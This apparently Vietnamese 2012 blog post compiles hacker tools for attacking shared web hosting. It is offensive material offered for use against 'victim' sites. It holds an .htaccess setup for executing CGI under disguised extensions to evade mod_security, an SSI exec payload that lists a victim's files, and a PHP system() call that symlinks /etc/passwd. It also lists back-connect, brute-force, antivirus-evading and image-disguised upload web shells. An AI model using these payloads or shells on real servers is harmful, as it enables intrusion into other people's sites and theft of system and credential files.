17 thg 6, 2012

Tổng hợp Tools Hacker

Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server


telnet 1.4
bypass mod sec (base64)

Telnet 1.3
.htaccess
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về

Admin Finder (tìm thư mục admin)


cmd.shtml > view source cmd.shtml

<!--#exec cmd="dir /home/victim/public_html/" -->
 cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml

<!--#include virtual='1.txt'-->
Bypass ln.zip
<?php
chmod('ln',0777);
system('./ln -s /etc/passwd > 1.txt');
?>
hoặc
./ln -s /home/victim/public_html/index.php 1.txt
File SymLink.php
/home/victim/public_html/index.php
Find Path qua error-log : http://victim.com/fuck
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
 Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ

Backuper.php (Leech code)
Shell Unkonw (Brute)
Shell images (r57)
Shell images (Webadmin)
Shell Dumper.php (Zip + Restor data)
Shell images aaa.php.jpg - shell upload
Shell help.php (upload file + chmod)
Unzip.php (giải nén các file bị zip)
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
telnet v1.3 (ko cần htaccess)
sym-pl.pl (symljnk cgi ko cần htaccess)
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
Locus Shell (back connect)
perl shell mr.thien (BackConnect)
Mysqldumper.php (BackConnect)
5.2.9 (BYpass)
dot.pl (tim user+domain)
upload.phpl (upload len path)
shell.xml (prefix admincp)
shell ,tạo file symljnk đối với từng version php ,direct , h4ckcity.php
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php

shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)
hoặc
python.py
shell sec4ever .qua mặt anti với code hoàn toàn # c99 & r57
vault.php (editor,webshell,bind)
saudi.php (symljnk root ,brute,...)
sa2.0.php(resever,symljnk root,upload)
madspotshell.php(symlink tung user)
r57-vip.php symljnk

Không có nhận xét nào:

Đăng nhận xét